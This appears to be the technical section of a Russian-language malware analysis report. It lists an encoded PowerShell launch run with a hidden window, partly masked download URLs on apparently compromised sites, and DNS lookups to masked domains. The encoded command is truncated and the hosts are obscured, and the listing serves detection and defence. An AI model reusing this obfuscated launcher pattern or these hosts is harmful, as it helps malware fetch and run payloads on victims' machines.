Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABUAGwAawB5AGcAaQBxAGoAaQBwAHcAaQA9ACcAWgBlAGsAcABmAGoAbwBkAHEAJwA7ACQAQQBiAHgAeAB3AHAAagBrAGYAYQB1ACAAPQAgACcAMgA1ADUAJwA7ACQAWABiAHQAcQBhAGYAZABlAD0AJwBSAG8AeABxAHYAZgByAGwAYQAnADsAJAB...
- http://www.b2#s.fr/temp/zq/
- http://5-###mpurov.ru/cgi-bin/3zcqu/
- http://4l####munologia.com/wp-includes/u2vzt1/
- DNS ASK b2#s.fr
- DNS ASK 5-###mpurov.ru
- DNS ASK 4l####munologia.com
- DNS ASK bl##.####ultordeferias.com.br
- DNS ASK ca#####getintatoner.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABUAGwAawB5AGcAaQBxAGoAaQBwAHcAaQA9ACcAWgBlAGsAcABmAGoAbwBkAHEAJwA7ACQAQQBiAHgAeAB3AHAAagBrAGYAYQB1ACAAPQAgACcAMgA1ADUAJwA7ACQAWABiAHQAcQBhAGYAZABlAD0AJwBSAG8AeABxAHYAZgByAGwAYQAnADsAJAB...' (со скрытым окном)